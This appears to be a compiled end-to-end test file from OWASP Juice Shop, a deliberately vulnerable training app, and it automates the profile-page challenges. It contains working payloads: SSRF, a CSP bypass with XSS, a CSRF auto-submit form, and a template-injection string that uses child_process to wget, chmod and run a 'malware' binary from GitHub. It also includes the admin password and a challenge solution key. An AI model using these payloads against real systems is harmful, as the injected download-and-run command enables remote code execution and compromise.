"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const config = require("config");
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
const utils = require('../../lib/utils');
describe('/profile', () => {
    let username, submitButton, url, setProfileImageButton;
    (0, e2eHelpers_1.beforeEachLogin)({ email: `admin@${config.get('application.domain')}`, password: 'admin123' });
    describe('challenge "ssrf"', () => {
        it('should be possible to request internal resources using image upload URL', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/profile`);
            url = (0, protractor_1.element)(protractor_1.by.id('url'));
            submitButton = (0, protractor_1.element)(protractor_1.by.id('submitUrl'));
            void url.sendKeys(`${protractor_1.browser.baseUrl}/solve/challenges/server-side?key=tRy_H4rd3r_n0thIng_iS_Imp0ssibl3`);
            void submitButton.click();
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/`);
            void protractor_1.browser.driver.sleep(5000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'SSRF' });
    });
    if (!utils.disableOnContainerEnv()) {
        describe('challenge "usernameXss"', () => {
            it('Username field should be susceptible to XSS attacks after disarming CSP via profile image URL', () => {
                void protractor_1.browser.waitForAngularEnabled(false);
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/profile`);
                const EC = protractor_1.protractor.ExpectedConditions;
                url = (0, protractor_1.element)(protractor_1.by.id('url'));
                setProfileImageButton = (0, protractor_1.element)(protractor_1.by.id('submitUrl'));
                void url.sendKeys("https://a.png; script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com");
                void setProfileImageButton.click();
                void protractor_1.browser.driver.sleep(5000);
                username = (0, protractor_1.element)(protractor_1.by.id('username'));
                submitButton = (0, protractor_1.element)(protractor_1.by.id('submit'));
                void username.sendKeys('<<a|ascript>alert(`xss`)</script>');
                void submitButton.click();
                void protractor_1.browser.wait(EC.alertIsPresent(), 10000, "'xss' alert is not present on /profile");
                void protractor_1.browser.switchTo().alert().then(alert => {
                    expect(alert.getText()).toEqual(Promise.resolve('xss'));
                    void alert.accept();
                });
                void username.clear();
                void username.sendKeys('αδмιη'); // disarm XSS
                void submitButton.click();
                void url.sendKeys(`${protractor_1.browser.baseUrl}/assets/public/images/uploads/default.svg`);
                void setProfileImageButton.click();
                void protractor_1.browser.driver.sleep(5000);
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/`);
                void protractor_1.browser.waitForAngularEnabled(true);
            });
            (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'CSP Bypass' });
        });
        describe('challenge "ssti"', () => {
            it('should be possible to inject arbitrary nodeJs commands in username', () => {
                void protractor_1.browser.waitForAngularEnabled(false);
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/profile`);
                username = (0, protractor_1.element)(protractor_1.by.id('username'));
                submitButton = (0, protractor_1.element)(protractor_1.by.id('submit'));
                void username.sendKeys('#{global.process.mainModule.require(\'child_process\').exec(\'wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware\')}');
                void submitButton.click();
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/solve/challenges/server-side?key=tRy_H4rd3r_n0thIng_iS_Imp0ssibl3`);
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/`);
                void protractor_1.browser.driver.sleep(10000);
                void protractor_1.browser.waitForAngularEnabled(true);
            });
            (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'SSTi' });
        });
    }
    describe('challenge "csrf"', () => {
        xit('should be possible to perform a CSRF attack against the user profile page', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.driver.get('http://htmledit.squarefree.com');
            void protractor_1.browser.driver.sleep(1000);
            /* The script executed below is equivalent to pasting this string into http://htmledit.squarefree.com: */
            /* <form action="http://localhost:42000/profile" method="POST"><input type="hidden" name="username" value="CSRF"/><input type="submit"/></form><script>document.forms[0].submit();</script> */
            void protractor_1.browser.executeScript(`document.getElementsByName('editbox')[0].contentDocument.getElementsByName('ta')[0].value = "<form action=\\"${protractor_1.browser.baseUrl}/profile\\" method=\\"POST\\"><input type=\\"hidden\\" name=\\"username\\" value=\\"CSRF\\"/><input type=\\"submit\\"/></form><script>document.forms[0].submit();</script>"`);
            void protractor_1.browser.driver.sleep(5000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        // expectChallengeSolved({ challenge: 'CSRF' })
        xit('should be possible to fake a CSRF attack against the user profile page', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            void protractor_1.browser.executeScript((baseUrl) => {
                const xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function () {
                    if (this.status === 200) {
                        console.log('Success');
                    }
                };
                const formData = new FormData();
                formData.append('username', 'CSRF');
                xhttp.open('POST', `${baseUrl}/profile`);
                xhttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
                xhttp.setRequestHeader('Origin', 'http://htmledit.squarefree.com'); // FIXME Not allowed by browser due to "unsafe header not permitted"
                xhttp.setRequestHeader('Cookie', `token=${localStorage.getItem('token')}`); // FIXME Not allowed by browser due to "unsafe header not permitted"
                xhttp.send(formData); //eslint-disable-line
            }, protractor_1.browser.baseUrl);
            void protractor_1.browser.driver.sleep(1000);
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        // expectChallengeSolved({ challenge: 'CSRF' })
    });
});
//# sourceMappingURL=profileSpec.js.map
